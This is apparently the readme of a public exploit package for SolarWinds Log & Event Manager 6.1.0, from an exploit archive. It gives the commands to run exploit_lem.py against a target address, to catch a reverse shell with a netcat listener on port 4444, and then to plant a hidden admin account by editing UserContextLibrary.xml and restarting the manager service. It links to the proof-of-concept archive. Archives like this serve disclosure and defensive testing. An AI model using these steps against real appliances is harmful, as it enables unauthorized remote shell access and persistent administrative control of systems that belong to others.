Requirements:
Python 2.7
netcat
Tested on:
Ubuntu 14.04 LTS
Vulnerable Appliance Version: 6.1.0
Download: http://downloads.solarwinds.com/solarwinds/Release/LEM/SolarWinds-LEM-v6.1.0-Evaluation-VMware.exe
Instructions:
The exploit_lem.py script will need to be run sudo since it uses sockets
which bind to port 21 and 80. These could be changed, but the rest of
the script would need to be modified as well.
Prior to running the python script, set up a netcat listener for the
reverse shell: netcat -l 4444
Example: sudo python exploit_lem.py -t 192.168.1.100 -b 192.168.1.101 -l 192.168.1.101 -lp 4444
After access has been gained to the appliance, a new admin user can be added to the web console
by editing /usr/local/contego/run/manager/UserContextLibrary.xml. Simply copy the xml structure
for the admin user that is already in there and then change the fields to create a new user. In
order to get a valid password hash, use the gen_pass_hash.py script included with this package.
Please note that a manager restart will be needed before you can login with the new user. This
can be accomplished by running "/etc/init.d/contego-manager restart"
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38644.zip